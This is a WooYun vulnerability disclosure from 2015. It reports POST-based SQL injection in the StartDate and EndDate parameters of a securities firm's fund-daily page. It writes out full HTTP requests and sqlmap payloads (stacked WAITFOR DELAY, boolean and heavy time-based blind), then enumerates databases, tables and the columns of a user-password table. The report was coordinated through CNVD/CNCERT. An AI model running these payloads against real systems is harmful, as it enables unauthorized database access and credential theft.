当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154981

漏洞标题:红塔证券主站官网多处SQL注入可获取用户密码等敏感信息(DBA权限/10库)

相关厂商:红塔证券

漏洞作者: 路人甲

提交时间:2015-11-23 13:58

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-23: 细节已通知厂商并且等待厂商处理中
2015-11-27: 厂商已经确认,细节仅向厂商公开
2015-12-07: 细节向核心白帽子及相关领域专家公开
2015-12-17: 细节向普通白帽子公开
2015-12-27: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

主站sql注入

详细说明:

1.红塔证券官网(http://**.**.**.**/)另一个参数SQL注入
构造如下POST数据,EndDate参数也存在注入

POST /funddaily/funddaily.aspx HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Content-Length: 1954
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/funddaily/funddaily.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: pgv_pvi=3648778240; ASP.NET_SessionId=yjctvujl3m4nbuzjgvlj2fri; IESESSION=alive; pgv_si=s5039997952
__VIEWSTATE=%2FwEPDwUJMzAzNTM4OTk3D2QWBAIBD2QWAmYPZBYCAgEPFgIeBGhyZWYFDi4uL2Nzcy9pZTguY3NzZAIDD2QWCgIBD2QWAmYPDxYCHgRUZXh0BeECPHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnIGxhbmd1YWdlPSdqYXZhc2NyaXB0Jz4NCnZhciBwaWNfd2lkdGg9OTYwOw0KdmFyIHBpY19oZWlnaHQ9MTY1Ow0KdmFyIGJ1dHRvbl9wb3M9NDsNCnZhciBzdG9wX3RpbWU9NzAwMDsNCnZhciBzaG93X3RleHQ9MDsNCnZhciB0eHRjb2xvcj0nMDAwMDAwJzsNCnZhciBiZ2NvbG9yPSdEREREREQnOw0KdmFyIGltYWc9bmV3IEFycmF5KCk7DQp2YXIgbGluaz1uZXcgQXJyYXkoKTsNCnZhciB0ZXh0PW5ldyBBcnJheSgpOw0KaW1hZ1sxXSA9ICcuLi9pbWFnZXMvQXJ0aWNsZUFEXzAxLmpwZyc7DQpsaW5rWzFdID0gJyMnOw0KdGV4dFsxXSA9ICcnOw0KPC9zY3JpcHQ%2BDQpkZAIDDw8WAh8BBRbnmbvls7Ay5Y%2B35YeA5YC85p%2Bl6K%2BiZGQCBQ8QZA8WAmYCARYCEAUQ57qi5aGU55m75bOwMuWPtwUQ57qi5aGU55m75bOwMuWPt2cQBRDnuqLloZTnmbvls7Ax5Y%2B3BRDnuqLloZTnmbvls7Ax5Y%2B3Z2RkAg0PFgIeC18hSXRlbUNvdW50Ag8WHmYPZBYCZg8VAxEyMDE15bm0MTHmnIgxM%2BaXpQYxLjQ5NTAGMS40OTUwZAIBD2QWAmYPFQMRMjAxNeW5tDEx5pyIMDbml6UGMS41MDMwBjEuNTAzMGQCAg9kFgJmDxUDETIwMTXlubQxMOaciDMw5pelBjEuNDQ3MAYxLjQ0NzBkAgMPZBYCZg8VAxEyMDE15bm0MTDmnIgyM%2BaXpQYxLjQ1ODAGMS40NTgwZAIED2QWAmYPFQMRMjAxNeW5tDEw5pyIMTnml6UGMS40NDIwBjEuNDQyMGQCBQ9kFgJmDxUDETIwMTXlubQxMOaciDE25pelBjEuNDQwMAYxLjQ0MDBkAgYPZBYCZg8VAxEyMDE15bm0MTDmnIgxNeaXpQYxLjQzMzAGMS40MzMwZAIHD2QWAmYPFQMRMjAxNeW5tDEw5pyIMTTml6UGMS40MTMwBjEuNDEzMGQCCA9kFgJmDxUDETIwMTXlubQxMOaciDEz5pelBjEuNDI0MAYxLjQyNDBkAgkPZBYCZg8VAxEyMDE15bm0MTDmnIgxMuaXpQYxLjQyNDAGMS40MjQwZAIKD2QWAmYPFQMRMjAxNeW5tDEw5pyIMDnml6UGMS40MDcwBjEuNDA3MGQCCw9kFgJmDxUDETIwMTXlubQxMOaciDA45pelBjEuNDAyMAYxLjQwMjBkAgwPZBYCZg8VAxEyMDE15bm0MDnmnIgzMOaXpQYxLjM3MjAGMS4zNzIwZAIND2QWAmYPFQMRMjAxNeW5tDA55pyIMjnml6UGMS4zNzUwBjEuMzc1MGQCDg9kFgJmDxUDETIwMTXlubQwOeaciDI45pelBjEuMzgzMAYxLjM4MzBkAg8PDxYCHgtSZWNvcmRjb3VudAL7AWRkZIDxmY%2FiN7mEJfPJ8NFUXqUxdHww&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=%2FwEWBgKyhpO4CgL9x7XJDQL%2Bx7XJDQL6z4jVBALluv3tCgK6x8iHASeYG2oIQZgQmCDeeJ3grEpxULOs&ProductName=%BA%EC%CB%FE%B5%C7%B7%E52%BA%C5&StartDate=&EndDate=&bt_query=%B2%E9+%D1%AF


测试结果如下:

web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: EndDate
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwUJMzAzNTM4OTk3D2QWBAIBD2QWAmYPZBYCAgEPFgIeBGhyZWYFDi4uL2Nzcy9pZTguY3NzZAIDD2QWCgIBD2QWAmYPDxYCHgRUZXh0BeECPHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnIGxhbmd1YWdlPSdqYXZhc2NyaXB0Jz4NCnZhciBwaWNfd2lkdGg9OTYwOw0KdmFyIHBpY19oZWlnaHQ9MTY1Ow0KdmFyIGJ1dHRvbl9wb3M9NDsNCnZhciBzdG9wX3RpbWU9NzAwMDsNCnZhciBzaG93X3RleHQ9MDsNCnZhciB0eHRjb2xvcj0nMDAwMDAwJzsNCnZhciBiZ2NvbG9yPSdEREREREQnOw0KdmFyIGltYWc9bmV3IEFycmF5KCk7DQp2YXIgbGluaz1uZXcgQXJyYXkoKTsNCnZhciB0ZXh0PW5ldyBBcnJheSgpOw0KaW1hZ1sxXSA9ICcuLi9pbWFnZXMvQXJ0aWNsZUFEXzAxLmpwZyc7DQpsaW5rWzFdID0gJyMnOw0KdGV4dFsxXSA9ICcnOw0KPC9zY3JpcHQ DQpkZAIDDw8WAh8BBRbnmbvls7Ay5Y 35YeA5YC85p l6K iZGQCBQ8QZA8WAmYCARYCEAUQ57qi5aGU55m75bOwMuWPtwUQ57qi5aGU55m75bOwMuWPt2cQBRDnuqLloZTnmbvls7Ax5Y 3BRDnuqLloZTnmbvls7Ax5Y 3Z2RkAg0PFgIeC18hSXRlbUNvdW50Ag8WHmYPZBYCZg8VAxEyMDE15bm0MTHmnIgxM aXpQYxLjQ5NTAGMS40OTUwZAIBD2QWAmYPFQMRMjAxNeW5tDEx5pyIMDbml6UGMS41MDMwBjEuNTAzMGQCAg9kFgJmDxUDETIwMTXlubQxMOaciDMw5pelBjEuNDQ3MAYxLjQ0NzBkAgMPZBYCZg8VAxEyMDE15bm0MTDmnIgyM aXpQYxLjQ1ODAGMS40NTgwZAIED2QWAmYPFQMRMjAxNeW5tDEw5pyIMTnml6UGMS40NDIwBjEuNDQyMGQCBQ9kFgJmDxUDETIwMTXlubQxMOaciDE25pelBjEuNDQwMAYxLjQ0MDBkAgYPZBYCZg8VAxEyMDE15bm0MTDmnIgxNeaXpQYxLjQzMzAGMS40MzMwZAIHD2QWAmYPFQMRMjAxNeW5tDEw5pyIMTTml6UGMS40MTMwBjEuNDEzMGQCCA9kFgJmDxUDETIwMTXlubQxMOaciDEz5pelBjEuNDI0MAYxLjQyNDBkAgkPZBYCZg8VAxEyMDE15bm0MTDmnIgxMuaXpQYxLjQyNDAGMS40MjQwZAIKD2QWAmYPFQMRMjAxNeW5tDEw5pyIMDnml6UGMS40MDcwBjEuNDA3MGQCCw9kFgJmDxUDETIwMTXlubQxMOaciDA45pelBjEuNDAyMAYxLjQwMjBkAgwPZBYCZg8VAxEyMDE15bm0MDnmnIgzMOaXpQYxLjM3MjAGMS4zNzIwZAIND2QWAmYPFQMRMjAxNeW5tDA55pyIMjnml6UGMS4zNzUwBjEuMzc1MGQCDg9kFgJmDxUDETIwMTXlubQwOeaciDI45pelBjEuMzgzMAYxLjM4MzBkAg8PDxYCHgtSZWNvcmRjb3VudAL7AWRkZIDxmY/iN7mEJfPJ8NFUXqUxdHww&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWBgKyhpO4CgL9x7XJDQL x7XJDQL6z4jVBALluv3tCgK6x8iHASeYG2oIQZgQmCDeeJ3grEpxULOs&ProductName=%BA%EC%CB%FE%B5%C7%B7%E52%BA%C5&StartDate=&EndDate='; WAITFOR DELAY '0:0:5'--&bt_query=%B2%E9 %D1%AF
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=/wEPDwUJMzAzNTM4OTk3D2QWBAIBD2QWAmYPZBYCAgEPFgIeBGhyZWYFDi4uL2Nzcy9pZTguY3NzZAIDD2QWCgIBD2QWAmYPDxYCHgRUZXh0BeECPHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnIGxhbmd1YWdlPSdqYXZhc2NyaXB0Jz4NCnZhciBwaWNfd2lkdGg9OTYwOw0KdmFyIHBpY19oZWlnaHQ9MTY1Ow0KdmFyIGJ1dHRvbl9wb3M9NDsNCnZhciBzdG9wX3RpbWU9NzAwMDsNCnZhciBzaG93X3RleHQ9MDsNCnZhciB0eHRjb2xvcj0nMDAwMDAwJzsNCnZhciBiZ2NvbG9yPSdEREREREQnOw0KdmFyIGltYWc9bmV3IEFycmF5KCk7DQp2YXIgbGluaz1uZXcgQXJyYXkoKTsNCnZhciB0ZXh0PW5ldyBBcnJheSgpOw0KaW1hZ1sxXSA9ICcuLi9pbWFnZXMvQXJ0aWNsZUFEXzAxLmpwZyc7DQpsaW5rWzFdID0gJyMnOw0KdGV4dFsxXSA9ICcnOw0KPC9zY3JpcHQ DQpkZAIDDw8WAh8BBRbnmbvls7Ay5Y 35YeA5YC85p l6K iZGQCBQ8QZA8WAmYCARYCEAUQ57qi5aGU55m75bOwMuWPtwUQ57qi5aGU55m75bOwMuWPt2cQBRDnuqLloZTnmbvls7Ax5Y 3BRDnuqLloZTnmbvls7Ax5Y 3Z2RkAg0PFgIeC18hSXRlbUNvdW50Ag8WHmYPZBYCZg8VAxEyMDE15bm0MTHmnIgxM aXpQYxLjQ5NTAGMS40OTUwZAIBD2QWAmYPFQMRMjAxNeW5tDEx5pyIMDbml6UGMS41MDMwBjEuNTAzMGQCAg9kFgJmDxUDETIwMTXlubQxMOaciDMw5pelBjEuNDQ3MAYxLjQ0NzBkAgMPZBYCZg8VAxEyMDE15bm0MTDmnIgyM aXpQYxLjQ1ODAGMS40NTgwZAIED2QWAmYPFQMRMjAxNeW5tDEw5pyIMTnml6UGMS40NDIwBjEuNDQyMGQCBQ9kFgJmDxUDETIwMTXlubQxMOaciDE25pelBjEuNDQwMAYxLjQ0MDBkAgYPZBYCZg8VAxEyMDE15bm0MTDmnIgxNeaXpQYxLjQzMzAGMS40MzMwZAIHD2QWAmYPFQMRMjAxNeW5tDEw5pyIMTTml6UGMS40MTMwBjEuNDEzMGQCCA9kFgJmDxUDETIwMTXlubQxMOaciDEz5pelBjEuNDI0MAYxLjQyNDBkAgkPZBYCZg8VAxEyMDE15bm0MTDmnIgxMuaXpQYxLjQyNDAGMS40MjQwZAIKD2QWAmYPFQMRMjAxNeW5tDEw5pyIMDnml6UGMS40MDcwBjEuNDA3MGQCCw9kFgJmDxUDETIwMTXlubQxMOaciDA45pelBjEuNDAyMAYxLjQwMjBkAgwPZBYCZg8VAxEyMDE15bm0MDnmnIgzMOaXpQYxLjM3MjAGMS4zNzIwZAIND2QWAmYPFQMRMjAxNeW5tDA55pyIMjnml6UGMS4zNzUwBjEuMzc1MGQCDg9kFgJmDxUDETIwMTXlubQwOeaciDI45pelBjEuMzgzMAYxLjM4MzBkAg8PDxYCHgtSZWNvcmRjb3VudAL7AWRkZIDxmY/iN7mEJfPJ8NFUXqUxdHww&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWBgKyhpO4CgL9x7XJDQL x7XJDQL6z4jVBALluv3tCgK6x8iHASeYG2oIQZgQmCDeeJ3grEpxULOs&ProductName=%BA%EC%CB%FE%B5%C7%B7%E52%BA%C5&StartDate=&EndDate=' WAITFOR DELAY '0:0:5'--&bt_query=%B2%E9 %D1%AF


10个数据库

10库.png


DBA权限

dba权限.png


HongTaStockDB包含47表

web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
Database: HongTaStockDB
[43 tables]
+--------------------+
| Article_view       |
| Article_view_bak   |
| Department         |
| VeBG_Education     |
| VeBG_Family        |
| VeBG_Working       |
| VeBG_hortations    |
| VeBG_punish        |
| VeGB_Other         |
| VeLanguages        |
| Vedetails          |
| ViewFunddaily      |
| tbfunddaily        |
| eLanguage          |
| eLanguage_Level    |
| gEDU_Degree        |
| gEDU_Level         |
| gEMP_BirthPlace    |
| gEMP_HealthStatus  |
| gEMP_Nation        |
| gEMP_Party         |
| job                |
| rRecruit_Request   |
| sysdiagrams        |
| tbMaps             |
| tbadvert           |
| tbarticle          |
| tbarticle_history  |
| tbbroker           |
| tbcolumn           |
| tbcount            |
| tbdepartment       |
| tbdict             |
| tbimage            |
| tbprogram          |
| tbrole             |
| tbrolepopedom      |
| tbsoftwaredownload |
| tbsysuser          |
| tbupfile           |
| tbuserpopedom      |
| tbuserrole         |
| viewbroker         |
+--------------------+


OK,就不在拖库了。

漏洞证明:

2.红塔证券主站(http://**.**.**.**/)主站存在POST型SQL注入一枚,可拖库获取所有用户的密码等敏感信息。

主站.png


构造如下post数据,其中StartDate存在注入,并且是DBA权限

POST /funddaily/funddaily.aspx HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Content-Length: 1954
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/funddaily/funddaily.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: pgv_pvi=3648778240; ASP.NET_SessionId=yjctvujl3m4nbuzjgvlj2fri; IESESSION=alive; pgv_si=s5039997952
__VIEWSTATE=%2FwEPDwUJMzAzNTM4OTk3D2QWBAIBD2QWAmYPZBYCAgEPFgIeBGhyZWYFDi4uL2Nzcy9pZTguY3NzZAIDD2QWCgIBD2QWAmYPDxYCHgRUZXh0BeECPHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnIGxhbmd1YWdlPSdqYXZhc2NyaXB0Jz4NCnZhciBwaWNfd2lkdGg9OTYwOw0KdmFyIHBpY19oZWlnaHQ9MTY1Ow0KdmFyIGJ1dHRvbl9wb3M9NDsNCnZhciBzdG9wX3RpbWU9NzAwMDsNCnZhciBzaG93X3RleHQ9MDsNCnZhciB0eHRjb2xvcj0nMDAwMDAwJzsNCnZhciBiZ2NvbG9yPSdEREREREQnOw0KdmFyIGltYWc9bmV3IEFycmF5KCk7DQp2YXIgbGluaz1uZXcgQXJyYXkoKTsNCnZhciB0ZXh0PW5ldyBBcnJheSgpOw0KaW1hZ1sxXSA9ICcuLi9pbWFnZXMvQXJ0aWNsZUFEXzAxLmpwZyc7DQpsaW5rWzFdID0gJyMnOw0KdGV4dFsxXSA9ICcnOw0KPC9zY3JpcHQ%2BDQpkZAIDDw8WAh8BBRbnmbvls7Ay5Y%2B35YeA5YC85p%2Bl6K%2BiZGQCBQ8QZA8WAmYCARYCEAUQ57qi5aGU55m75bOwMuWPtwUQ57qi5aGU55m75bOwMuWPt2cQBRDnuqLloZTnmbvls7Ax5Y%2B3BRDnuqLloZTnmbvls7Ax5Y%2B3Z2RkAg0PFgIeC18hSXRlbUNvdW50Ag8WHmYPZBYCZg8VAxEyMDE15bm0MTHmnIgxM%2BaXpQYxLjQ5NTAGMS40OTUwZAIBD2QWAmYPFQMRMjAxNeW5tDEx5pyIMDbml6UGMS41MDMwBjEuNTAzMGQCAg9kFgJmDxUDETIwMTXlubQxMOaciDMw5pelBjEuNDQ3MAYxLjQ0NzBkAgMPZBYCZg8VAxEyMDE15bm0MTDmnIgyM%2BaXpQYxLjQ1ODAGMS40NTgwZAIED2QWAmYPFQMRMjAxNeW5tDEw5pyIMTnml6UGMS40NDIwBjEuNDQyMGQCBQ9kFgJmDxUDETIwMTXlubQxMOaciDE25pelBjEuNDQwMAYxLjQ0MDBkAgYPZBYCZg8VAxEyMDE15bm0MTDmnIgxNeaXpQYxLjQzMzAGMS40MzMwZAIHD2QWAmYPFQMRMjAxNeW5tDEw5pyIMTTml6UGMS40MTMwBjEuNDEzMGQCCA9kFgJmDxUDETIwMTXlubQxMOaciDEz5pelBjEuNDI0MAYxLjQyNDBkAgkPZBYCZg8VAxEyMDE15bm0MTDmnIgxMuaXpQYxLjQyNDAGMS40MjQwZAIKD2QWAmYPFQMRMjAxNeW5tDEw5pyIMDnml6UGMS40MDcwBjEuNDA3MGQCCw9kFgJmDxUDETIwMTXlubQxMOaciDA45pelBjEuNDAyMAYxLjQwMjBkAgwPZBYCZg8VAxEyMDE15bm0MDnmnIgzMOaXpQYxLjM3MjAGMS4zNzIwZAIND2QWAmYPFQMRMjAxNeW5tDA55pyIMjnml6UGMS4zNzUwBjEuMzc1MGQCDg9kFgJmDxUDETIwMTXlubQwOeaciDI45pelBjEuMzgzMAYxLjM4MzBkAg8PDxYCHgtSZWNvcmRjb3VudAL7AWRkZIDxmY%2FiN7mEJfPJ8NFUXqUxdHww&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=%2FwEWBgKyhpO4CgL9x7XJDQL%2Bx7XJDQL6z4jVBALluv3tCgK6x8iHASeYG2oIQZgQmCDeeJ3grEpxULOs&ProductName=%BA%EC%CB%FE%B5%C7%B7%E52%BA%C5&StartDate=&EndDate=&bt_query=%B2%E9+%D1%AF


测试结果如下

Place: POST
Parameter: StartDate
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwUJMzAzNTM4OTk3D2QWBAIBD2QWAmYPZBYCAgEPFgIeBGhyZWYFDi4uL2Nzcy9pZTguY3NzZAIDD2QWCgIBD2QWAmYPDxYCHgRUZXh0BeECPHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnIGxhbmd1YWdlPSdqYXZhc2NyaXB0Jz4NCnZhciBwaWNfd2lkdGg9OTYwOw0KdmFyIHBpY19oZWlnaHQ9MTY1Ow0KdmFyIGJ1dHRvbl9wb3M9NDsNCnZhciBzdG9wX3RpbWU9NzAwMDsNCnZhciBzaG93X3RleHQ9MDsNCnZhciB0eHRjb2xvcj0nMDAwMDAwJzsNCnZhciBiZ2NvbG9yPSdEREREREQnOw0KdmFyIGltYWc9bmV3IEFycmF5KCk7DQp2YXIgbGluaz1uZXcgQXJyYXkoKTsNCnZhciB0ZXh0PW5ldyBBcnJheSgpOw0KaW1hZ1sxXSA9ICcuLi9pbWFnZXMvQXJ0aWNsZUFEXzAxLmpwZyc7DQpsaW5rWzFdID0gJyMnOw0KdGV4dFsxXSA9ICcnOw0KPC9zY3JpcHQ DQpkZAIDDw8WAh8BBRbnmbvls7Ay5Y 35YeA5YC85p l6K iZGQCBQ8QZA8WAmYCARYCEAUQ57qi5aGU55m75bOwMuWPtwUQ57qi5aGU55m75bOwMuWPt2cQBRDnuqLloZTnmbvls7Ax5Y 3BRDnuqLloZTnmbvls7Ax5Y 3Z2RkAg0PFgIeC18hSXRlbUNvdW50Ag8WHmYPZBYCZg8VAxEyMDE15bm0MTHmnIgxM aXpQYxLjQ5NTAGMS40OTUwZAIBD2QWAmYPFQMRMjAxNeW5tDEx5pyIMDbml6UGMS41MDMwBjEuNTAzMGQCAg9kFgJmDxUDETIwMTXlubQxMOaciDMw5pelBjEuNDQ3MAYxLjQ0NzBkAgMPZBYCZg8VAxEyMDE15bm0MTDmnIgyM aXpQYxLjQ1ODAGMS40NTgwZAIED2QWAmYPFQMRMjAxNeW5tDEw5pyIMTnml6UGMS40NDIwBjEuNDQyMGQCBQ9kFgJmDxUDETIwMTXlubQxMOaciDE25pelBjEuNDQwMAYxLjQ0MDBkAgYPZBYCZg8VAxEyMDE15bm0MTDmnIgxNeaXpQYxLjQzMzAGMS40MzMwZAIHD2QWAmYPFQMRMjAxNeW5tDEw5pyIMTTml6UGMS40MTMwBjEuNDEzMGQCCA9kFgJmDxUDETIwMTXlubQxMOaciDEz5pelBjEuNDI0MAYxLjQyNDBkAgkPZBYCZg8VAxEyMDE15bm0MTDmnIgxMuaXpQYxLjQyNDAGMS40MjQwZAIKD2QWAmYPFQMRMjAxNeW5tDEw5pyIMDnml6UGMS40MDcwBjEuNDA3MGQCCw9kFgJmDxUDETIwMTXlubQxMOaciDA45pelBjEuNDAyMAYxLjQwMjBkAgwPZBYCZg8VAxEyMDE15bm0MDnmnIgzMOaXpQYxLjM3MjAGMS4zNzIwZAIND2QWAmYPFQMRMjAxNeW5tDA55pyIMjnml6UGMS4zNzUwBjEuMzc1MGQCDg9kFgJmDxUDETIwMTXlubQwOeaciDI45pelBjEuMzgzMAYxLjM4MzBkAg8PDxYCHgtSZWNvcmRjb3VudAL7AWRkZIDxmY/iN7mEJfPJ8NFUXqUxdHww&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWBgKyhpO4CgL9x7XJDQL x7XJDQL6z4jVBALluv3tCgK6x8iHASeYG2oIQZgQmCDeeJ3grEpxULOs&ProductName=%BA%EC%CB%FE%B5%C7%B7%E52%BA%C5&StartDate=' AND 2953=2953 AND 'Udqw'='Udqw&EndDate=&bt_query=%B2%E9 %D1%AF
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: __VIEWSTATE=/wEPDwUJMzAzNTM4OTk3D2QWBAIBD2QWAmYPZBYCAgEPFgIeBGhyZWYFDi4uL2Nzcy9pZTguY3NzZAIDD2QWCgIBD2QWAmYPDxYCHgRUZXh0BeECPHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnIGxhbmd1YWdlPSdqYXZhc2NyaXB0Jz4NCnZhciBwaWNfd2lkdGg9OTYwOw0KdmFyIHBpY19oZWlnaHQ9MTY1Ow0KdmFyIGJ1dHRvbl9wb3M9NDsNCnZhciBzdG9wX3RpbWU9NzAwMDsNCnZhciBzaG93X3RleHQ9MDsNCnZhciB0eHRjb2xvcj0nMDAwMDAwJzsNCnZhciBiZ2NvbG9yPSdEREREREQnOw0KdmFyIGltYWc9bmV3IEFycmF5KCk7DQp2YXIgbGluaz1uZXcgQXJyYXkoKTsNCnZhciB0ZXh0PW5ldyBBcnJheSgpOw0KaW1hZ1sxXSA9ICcuLi9pbWFnZXMvQXJ0aWNsZUFEXzAxLmpwZyc7DQpsaW5rWzFdID0gJyMnOw0KdGV4dFsxXSA9ICcnOw0KPC9zY3JpcHQ DQpkZAIDDw8WAh8BBRbnmbvls7Ay5Y 35YeA5YC85p l6K iZGQCBQ8QZA8WAmYCARYCEAUQ57qi5aGU55m75bOwMuWPtwUQ57qi5aGU55m75bOwMuWPt2cQBRDnuqLloZTnmbvls7Ax5Y 3BRDnuqLloZTnmbvls7Ax5Y 3Z2RkAg0PFgIeC18hSXRlbUNvdW50Ag8WHmYPZBYCZg8VAxEyMDE15bm0MTHmnIgxM aXpQYxLjQ5NTAGMS40OTUwZAIBD2QWAmYPFQMRMjAxNeW5tDEx5pyIMDbml6UGMS41MDMwBjEuNTAzMGQCAg9kFgJmDxUDETIwMTXlubQxMOaciDMw5pelBjEuNDQ3MAYxLjQ0NzBkAgMPZBYCZg8VAxEyMDE15bm0MTDmnIgyM aXpQYxLjQ1ODAGMS40NTgwZAIED2QWAmYPFQMRMjAxNeW5tDEw5pyIMTnml6UGMS40NDIwBjEuNDQyMGQCBQ9kFgJmDxUDETIwMTXlubQxMOaciDE25pelBjEuNDQwMAYxLjQ0MDBkAgYPZBYCZg8VAxEyMDE15bm0MTDmnIgxNeaXpQYxLjQzMzAGMS40MzMwZAIHD2QWAmYPFQMRMjAxNeW5tDEw5pyIMTTml6UGMS40MTMwBjEuNDEzMGQCCA9kFgJmDxUDETIwMTXlubQxMOaciDEz5pelBjEuNDI0MAYxLjQyNDBkAgkPZBYCZg8VAxEyMDE15bm0MTDmnIgxMuaXpQYxLjQyNDAGMS40MjQwZAIKD2QWAmYPFQMRMjAxNeW5tDEw5pyIMDnml6UGMS40MDcwBjEuNDA3MGQCCw9kFgJmDxUDETIwMTXlubQxMOaciDA45pelBjEuNDAyMAYxLjQwMjBkAgwPZBYCZg8VAxEyMDE15bm0MDnmnIgzMOaXpQYxLjM3MjAGMS4zNzIwZAIND2QWAmYPFQMRMjAxNeW5tDA55pyIMjnml6UGMS4zNzUwBjEuMzc1MGQCDg9kFgJmDxUDETIwMTXlubQwOeaciDI45pelBjEuMzgzMAYxLjM4MzBkAg8PDxYCHgtSZWNvcmRjb3VudAL7AWRkZIDxmY/iN7mEJfPJ8NFUXqUxdHww&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWBgKyhpO4CgL9x7XJDQL x7XJDQL6z4jVBALluv3tCgK6x8iHASeYG2oIQZgQmCDeeJ3grEpxULOs&ProductName=%BA%EC%CB%FE%B5%C7%B7%E52%BA%C5&StartDate=' AND 1780=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'oCWX'='oCWX&EndDate=&bt_query=%B2%E9 %D1%AF
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005


DBA权限:

dba权限.png


10个库:

10库.png


current-db:

当前数据库.png


HongTaStockDB数据库包含43个tables

web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
Database: HongTaStockDB
[43 tables]
+--------------------+
| Article_view       |
| Article_view_bak   |
| Department         |
| VeBG_Education     |
| VeBG_Family        |
| VeBG_Working       |
| VeBG_hortations    |
| VeBG_punish        |
| VeGB_Other         |
| VeLanguages        |
| Vedetails          |
| ViewFunddaily      |
| tbfunddaily        |
| eLanguage          |
| eLanguage_Level    |
| gEDU_Degree        |
| gEDU_Level         |
| gEMP_BirthPlace    |
| gEMP_HealthStatus  |
| gEMP_Nation        |
| gEMP_Party         |
| job                |
| rRecruit_Request   |
| sysdiagrams        |
| tbMaps             |
| tbadvert           |
| tbarticle          |
| tbarticle_history  |
| tbbroker           |
| tbcolumn           |
| tbcount            |
| tbdepartment       |
| tbdict             |
| tbimage            |
| tbprogram          |
| tbrole             |
| tbrolepopedom      |
| tbsoftwaredownload |
| tbsysuser          |
| tbupfile           |
| tbuserpopedom      |
| tbuserrole         |
| viewbroker         |
+--------------------+


其中包含tbsysuser表,查询下,包含系统用户密码等信息

web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
Database: HongTaStockDB
Table: tbsysuser
[7 columns]
+-----------+----------+
| Column    | Type     |
+-----------+----------+
| cdate     | datetime |
| departnum | int      |
| mac1      | varchar  |
| mac2      | varchar  |
| name      | nvarchar |
| pwd       | nvarchar |
| userid    | int      |
+-----------+----------+


系统用户一共45个

系统用户.png


查询几个用户看下(示意下,没跑完),用户名密码如下

密码.png


OK 说完了。

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-11-27 09:57

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向证监会通报,由其后续协调网站管理单位处置。

最新状态:

暂无

漏洞评价:

评价